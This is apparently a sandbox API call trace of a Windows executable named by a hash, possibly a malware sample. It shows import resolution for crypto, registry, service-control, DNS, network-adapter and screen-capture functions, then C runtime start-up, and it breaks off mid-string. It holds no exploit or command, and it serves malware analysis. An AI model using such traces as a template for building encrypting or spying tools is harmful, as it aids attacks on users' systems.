GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0048.892] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0048.892] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0048.892] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0048.892] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0048.892] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0048.892] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0048.892] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0048.892] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0048.892] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0048.892] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0048.893] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0048.893] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0048.893] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0048.893] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0048.893] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0048.893] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0048.893] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0048.893] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0048.893] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0048.893] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0048.893] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0048.893] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0048.894] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThread") returned 0x76d417ec [0048.894] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0048.894] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0048.894] GetProcAddress (hModule=0x77130000, lpProcName="PeekMessageW") returned 0x771505ba [0048.894] GetProcAddress (hModule=0x77130000, lpProcName="PostThreadMessageW") returned 0x77148bff [0048.894] GetProcAddress (hModule=0x77130000, lpProcName="DefWindowProcW") returned 0x77c725dd [0048.894] GetProcAddress (hModule=0x77130000, lpProcName="DispatchMessageW") returned 0x7714787b [0048.894] GetProcAddress (hModule=0x77130000, lpProcName="UpdateWindow") returned 0x77153559 [0048.894] GetProcAddress (hModule=0x77130000, lpProcName="CreateWindowExW") returned 0x77148a29 [0048.894] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0048.894] GetProcAddress (hModule=0x77130000, lpProcName="IsWindow") returned 0x77147136 [0048.894] GetProcAddress (hModule=0x77130000, lpProcName="ShowWindow") returned 0x77150dfb [0048.895] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClassExW") returned 0x7714b17d [0048.895] GetProcAddress (hModule=0x77130000, lpProcName="PostQuitMessage") returned 0x77149abb [0048.895] GetProcAddress (hModule=0x77130000, lpProcName="GetMessageW") returned 0x771478e2 [0048.895] GetProcAddress (hModule=0x77130000, lpProcName="DestroyWindow") returned 0x77149a55 [0048.895] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0048.895] GetProcAddress (hModule=0x77130000, lpProcName="GetProcessWindowStation") returned 0x77149eea [0048.895] GetProcAddress (hModule=0x77130000, lpProcName="GetUserObjectInformationW") returned 0x77148068 [0048.895] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0048.895] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0048.895] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxW") returned 0x7719fd3f [0048.895] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMessage") returned 0x77147809 [0048.895] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0048.896] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0048.896] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0048.896] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0048.896] GetProcAddress (hModule=0x77710000, lpProcName="ReportEventA") returned 0x77713ee9 [0048.896] GetProcAddress (hModule=0x77710000, lpProcName="RegisterEventSourceA") returned 0x77722d46 [0048.896] GetProcAddress (hModule=0x77710000, lpProcName="DeregisterEventSource") returned 0x777235dd [0048.896] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashData") returned 0x7771df36 [0048.896] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0048.896] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0048.896] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0048.896] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0048.897] GetProcAddress (hModule=0x77710000, lpProcName="CryptCreateHash") returned 0x7771df4e [0048.897] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0048.897] GetProcAddress (hModule=0x77710000, lpProcName="CryptImportKey") returned 0x7771c532 [0048.897] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatus") returned 0x77722a86 [0048.897] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0048.897] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0048.897] GetProcAddress (hModule=0x77710000, lpProcName="OpenServiceW") returned 0x7771ca4c [0048.897] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0048.897] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0048.897] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetHashParam") returned 0x7771df7e [0048.897] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0052.218] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetPathFromIDListW") returned 0x75a617bf [0052.218] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetSpecialFolderLocation") returned 0x75a5e141 [0052.218] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0052.219] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0052.219] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0052.219] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0052.219] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0052.219] GetProcAddress (hModule=0x76620000, lpProcName="CoInitialize") returned 0x7663b636 [0052.219] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0052.219] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0052.220] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0052.220] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0052.220] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0052.220] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0052.220] GetProcAddress (hModule=0x76e40000, lpProcName=0x9) returned 0x76e43eae [0052.220] GetProcAddress (hModule=0x76e40000, lpProcName=0xc8) returned 0x76e43f21 [0052.220] GetProcAddress (hModule=0x76e40000, lpProcName=0xca) returned 0x76e4fd6b [0052.220] GetProcAddress (hModule=0x76e40000, lpProcName=0xc9) returned 0x76e44af8 [0052.220] GetProcAddress (hModule=0x76e40000, lpProcName=0xc) returned 0x76e45dee [0052.220] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0052.220] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x75600000 [0052.828] GetProcAddress (hModule=0x75600000, lpProcName="GetAdaptersInfo") returned 0x75609263 [0052.828] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x77230000 [0053.306] GetProcAddress (hModule=0x77230000, lpProcName=0xc) returned 0x7723b131 [0053.306] GetProcAddress (hModule=0x77230000, lpProcName=0xb) returned 0x7723311b [0053.306] GetProcAddress (hModule=0x77230000, lpProcName=0x34) returned 0x77247673 [0053.306] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x755a0000 [0053.582] GetProcAddress (hModule=0x755a0000, lpProcName="DnsFree") returned 0x755a436b [0053.583] GetProcAddress (hModule=0x755a0000, lpProcName="DnsQuery_W") returned 0x755b572c [0053.583] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77550000 [0053.583] GetProcAddress (hModule=0x77550000, lpProcName="CryptStringToBinaryA") returned 0x77585d77 [0053.583] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0053.583] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0053.583] GetProcAddress (hModule=0x770a0000, lpProcName="GetObjectA") returned 0x770b85d4 [0053.583] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0053.584] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0053.586] GetProcAddress (hModule=0x770a0000, lpProcName="GetBitmapBits") returned 0x770bc155 [0053.586] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0053.586] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0053.586] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDCA") returned 0x770b7bcc [0053.586] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0053.586] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0053.586] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754e0000 [0054.061] GetProcAddress (hModule=0x754e0000, lpProcName="atexit") returned 0x754fc544 [0054.061] atexit (param_1=0x6a0920) returned 0 [0054.076] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f808 | out: lpSystemTimeAsFileTime=0x18f808*(dwLowDateTime=0x2879c820, dwHighDateTime=0x1d60a66)) [0054.077] GetCurrentThreadId () returned 0xb40 [0054.077] GetCurrentProcessId () returned 0xb44 [0054.077] QueryPerformanceCounter (in: lpPerformanceCount=0x18f800 | out: lpPerformanceCount=0x18f800*=17441948890) returned 1 [0054.142] GetStartupInfoW (in: lpStartupInfo=0x18f798 | out: lpStartupInfo=0x18f798*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76d43519, hStdOutput=0x77c5fd35, hStdError=0x77cc7daf)) [0054.159] GetProcessHeap () returned 0x220000 [0054.286] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0054.286] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0054.287] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0054.287] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0054.287] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0054.287] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0054.287] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0054.287] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0054.287] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0054.287] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0054.288] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0054.288] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0054.288] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0054.288] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0054.288] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0054.288] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0054.288] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0054.288] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0054.289] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0054.289] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0054.289] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0054.289] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0054.289] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0054.289] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0054.289] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0054.290] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0054.290] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0054.290] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0054.290] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0054.290] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0054.290] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0054.290] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0054.290] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0054.291] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0054.313] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x3bc) returned 0x23f818 [0054.314] GetCurrentThreadId () returned 0xb40 [0054.325] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x18) returned 0x230a50 [0054.325] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x800) returned 0x23fbe0 [0054.325] GetStartupInfoW (in: lpStartupInfo=0x18f768 | out: lpStartupInfo=0x18f768*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0x2630c940, hStdError=0x44)) [0054.326] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0054.326] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0054.326] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0054.326] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" " [0054.326] GetEnvironmentStringsW () returned 0x2403e8* [0054.326] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0xaca) returned 0x240ec0 [0054.449] FreeEnvironmentStringsW (penv=0x2403e8) returned 1 [0054.460] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe")) returned 0xa5 [0054.460] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x154) returned 0x241998 [0054.471] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x98) returned 0x241af8 [0054.471] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x3e) returned 0x235b08 [0054.471] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x6c) returned 0x241b98 [0054.471] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x6e) returned 0x241c10 [0054.471] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x78) returned 0x231d58 [0054.471] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x62) returned 0x241c88 [0054.471] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x2e) returned 0x23b3f8 [0054.471] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x48) returned 0x236fb0 [0054.471] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x28) returned 0x23adf0 [0054.471] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x1a) returned 0x23f5d0 [0054.471] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x4a) returned 0x241cf8 [0054.471] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x72) returned 0x231dd8 [0054.471] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x30) returned 0x23b430 [0054.471] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x2e) returned 0x23b468 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x1c) returned 0x23f5f8 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xd2) returned 0x241d50 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x7c) returned 0x241e30 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x36) returned 0x241eb8 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x3a) returned 0x235b50 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x90) returned 0x241ef8 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x24) returned 0x23ae20 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x30) returned 0x23b4a0 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x36) returned 0x241f90 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x48) returned 0x237000 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x52) returned 0x2403e8 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x3c) returned 0x235b98 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x82) returned 0x240448 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x2e) returned 0x23b4d8 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x1e) returned 0x23f620 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x2c) returned 0x23b510 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x54) returned 0x2404d8 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x52) returned 0x240538 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x2a) returned 0x23b548 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x3c) returned 0x235be0 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x54) returned 0x240598 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x24) returned 0x23ae50 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x30) returned 0x23b580 [0054.472] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x8c) returned 0x2405f8 [0054.472] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x240ec0 | out: hHeap=0x220000) returned 1 [0054.564] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x800) returned 0x240690 [0054.575] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x80) returned 0x240e98 [0054.625] GetLastError () returned 0x0 [0054.626] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x220) returned 0x240f20 [0054.626] GetLastError () returned 0x0 [0054.626] IsValidCodePage (CodePage=0x4e4) returned 1 [0054.626] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f75c | out: lpCPInfo=0x18f75c) returned 1 [0054.638] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f224 | out: lpCPInfo=0x18f224) returned 1 [0054.649] GetLastError () returned 0x0 [0054.666] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f638, cbMultiByte=256, lpWideCharStr=0x18efa8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0054.667] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f238 | out: lpCharType=0x18f238) returned 1 [0054.667] GetLastError () returned 0x0 [0054.678] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0054.679] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18ed68, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0054.679] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18f538, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ 